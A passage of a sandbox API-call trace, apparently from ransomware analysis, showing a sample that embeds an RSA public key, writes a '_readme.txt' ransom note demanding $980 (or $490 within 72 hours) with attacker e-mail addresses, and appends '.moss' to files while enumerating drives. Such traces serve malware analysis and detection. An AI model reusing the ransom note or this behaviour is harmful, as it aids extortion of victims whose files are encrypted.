returned="D00804D48DE1" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48DE1", lpString2="C8" | out: lpString1="D00804D48DE1C8") returned="D00804D48DE1C8" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48DE1C8", lpString2="31" | out: lpString1="D00804D48DE1C831") returned="D00804D48DE1C831" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48DE1C831", lpString2="C3" | out: lpString1="D00804D48DE1C831C3") returned="D00804D48DE1C831C3" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48DE1C831C3", lpString2="FA" | out: lpString1="D00804D48DE1C831C3FA") returned="D00804D48DE1C831C3FA" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48DE1C831C3FA", lpString2="AD" | out: lpString1="D00804D48DE1C831C3FAAD") returned="D00804D48DE1C831C3FAAD" [0160.602] GetLastError () returned 0x0 [0160.602] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD", lpString2="27" | out: lpString1="D00804D48DE1C831C3FAAD27") returned="D00804D48DE1C831C3FAAD27" [0160.603] GetLastError () returned 0x0 [0160.603] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27", lpString2="D9" | out: lpString1="D00804D48DE1C831C3FAAD27D9") returned="D00804D48DE1C831C3FAAD27D9" [0160.603] GetLastError () returned 0x0 [0160.603] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27D9", lpString2="3A" | out: lpString1="D00804D48DE1C831C3FAAD27D93A") returned="D00804D48DE1C831C3FAAD27D93A" [0160.603] GetLastError () returned 0x0 [0160.603] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27D93A", lpString2="39" | out: lpString1="D00804D48DE1C831C3FAAD27D93A39") returned="D00804D48DE1C831C3FAAD27D93A39" [0160.603] GetLastError () returned 0x0 [0160.603] lstrcatA (in: lpString1="D00804D48DE1C831C3FAAD27D93A39", lpString2="40" | out: lpString1="D00804D48DE1C831C3FAAD27D93A3940") returned="D00804D48DE1C831C3FAAD27D93A3940" [0160.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3573260 | out: hHeap=0x2c0000) returned 1 [0160.603] CryptDestroyHash (hHash=0x3577500) returned 1 [0160.603] CryptReleaseContext (hProv=0x31dde0, dwFlags=0x0) returned 1 [0160.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a050a0 | out: hHeap=0x2c0000) returned 1 [0160.603] lstrlenA (lpString="D00804D48DE1C831C3FAAD27D93A3940") returned 32 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3e0) returned 0x35e1bb8 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5ee) returned 0x3a04aa8 [0160.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3a04aa8, cbMultiByte=1518, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 495 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5f0) returned 0x3a050a0 [0160.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a04aa8 | out: hHeap=0x2c0000) returned 1 [0160.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e1bb8 | out: hHeap=0x2c0000) returned 1 [0160.603] lstrcpyA (in: lpString1=0x3557660, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0160.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a050a0 | out: hHeap=0x2c0000) returned 1 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39db40 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x39ffb68 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356aa60 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356acc8 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356af30 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356b198 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356b400 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356b668 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356b8d0 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356bb38 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356bda0 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356c008 [0160.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x816) returned 0x3a04aa8 [0160.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de10, cbMultiByte=-1, lpWideCharStr=0x3a04aa8, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a052c8 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a04aa8 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x39ffb98 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356c270 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356c4d8 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356c740 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356c9a8 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356cc10 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356ce78 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356d0e0 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356d348 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356d5b0 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356d818 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x35e2118 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x35219d8 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e2118 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x353ec58 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35219d8 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x35e0f98 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353ec58 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x412) returned 0x35e1bb8 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e0f98 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x61a) returned 0x3a04aa8 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e1bb8 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x440) returned 0x35e1bb8 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1060) returned 0x3a05af0 [0160.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x35e1bb8, cbMultiByte=-1, lpWideCharStr=0x3a05af0, cchWideChar=2096 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned 1073 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1070) returned 0x3a06b58 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a05af0 | out: hHeap=0x2c0000) returned 1 [0160.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e1bb8 | out: hHeap=0x2c0000) returned 1 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x39ffbc8 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356da80 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x356dce8 [0160.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e4070 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e42d8 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e4540 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e47a8 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e4a10 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e4c78 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e4ee0 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e5148 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80a) returned 0x3a05af0 [0160.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18de10, cbMultiByte=-1, lpWideCharStr=0x3a05af0, cchWideChar=1029 | out: lpWideCharStr=".moss") returned 6 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a06308 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a05af0 | out: hHeap=0x2c0000) returned 1 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3578b10 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35795c8 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3573140 | out: hHeap=0x2c0000) returned 1 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00b78 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x48) returned 0x3570050 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35795c8 | out: hHeap=0x2c0000) returned 1 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39dc10 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39dc78 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3570050 | out: hHeap=0x2c0000) returned 1 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x35470a8 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x39a050 [0160.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39dc78 | out: hHeap=0x2c0000) returned 1 [0160.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00bd0 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00c28 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd8) returned 0x34f0fb8 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39a050 | out: hHeap=0x2c0000) returned 1 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3547138 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3578ca0 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00c80 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x138) returned 0x35aa398 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f0fb8 | out: hHeap=0x2c0000) returned 1 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39dc78 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3547180 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00cd8 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a00d30 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c8) returned 0x39fcd50 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35aa398 | out: hHeap=0x2c0000) returned 1 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x35471c8 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0c3d8 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3578b10 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00b78 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39dc10 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35470a8 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00bd0 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00c28 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3547138 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3578ca0 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00c80 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39dc78 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3547180 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00cd8 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a00d30 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35471c8 | out: hHeap=0x2c0000) returned 1 [0160.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39fcd50 | out: hHeap=0x2c0000) returned 1 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x39ffbf8 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e53b0 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e5618 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e5880 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e5ae8 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e5d50 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e5fb8 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e6220 [0160.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e6488 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e66f0 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x35e6958 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x35e2118 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x35219d8 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e2118 | out: hHeap=0x2c0000) returned 1 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x353ec58 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35219d8 | out: hHeap=0x2c0000) returned 1 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x35e0f98 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353ec58 | out: hHeap=0x2c0000) returned 1 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x412) returned 0x35e1bb8 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e0f98 | out: hHeap=0x2c0000) returned 1 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x61a) returned 0x3a05af0 [0160.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e1bb8 | out: hHeap=0x2c0000) returned 1 [0160.607] GetUserNameW (in: lpBuffer=0x18e010, pcbBuffer=0x18de84 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18de84) returned 1 [0160.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x590) returned 0x3a0c310 [0160.607] GetLastError () returned 0x0 [0160.609] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18db78, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.609] GetLastError () returned 0x3 [0160.609] GetLastError () returned 0x3 [0160.609] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0160.610] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18db78, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac [0160.610] GetFileType (hFile=0x5ac) returned 0x1 [0160.610] GetLastError () returned 0x0 [0160.616] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.616] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0160.616] RegisterClassExW (param_1=0x18ddf0) returned 0xc168 [0160.616] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30168 [0160.616] NtdllDefWindowProc_W () returned 0x0 [0160.617] NtdllDefWindowProc_W () returned 0x1 [0160.618] NtdllDefWindowProc_W () returned 0x0 [0160.783] NtdllDefWindowProc_W () returned 0x0 [0160.783] ShowWindow (hWnd=0x30168, nCmdShow=0) returned 0 [0160.783] UpdateWindow (hWnd=0x30168) returned 1 [0160.783] GetLogicalDrives () returned 0x4 [0160.783] SetErrorMode (uMode=0x1) returned 0x0 [0160.783] PathFileExistsA (pszPath="C:\\") returned 1 [0160.784] SetErrorMode (uMode=0x0) returned 0x1 [0160.784] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x35e8058 [0160.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18dda8, cbMultiByte=-1, lpWideCharStr=0x35e8058, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x35e8868 [0160.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e8058 | out: hHeap=0x2c0000) returned 1 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x3573140 [0160.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e8868 | out: hHeap=0x2c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3573140 | out: hHeap=0x2c0000) returned 1 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x3573140 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x39f2640 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x35e8058 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x35eb0f8 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a32a80 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1070) returned 0x3a083f0 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39dc10 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a09468 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x660) returned 0x35e8950 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a33308 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a33b90 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a34418 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a34ca0 [0160.784] RtlAllocateHeap 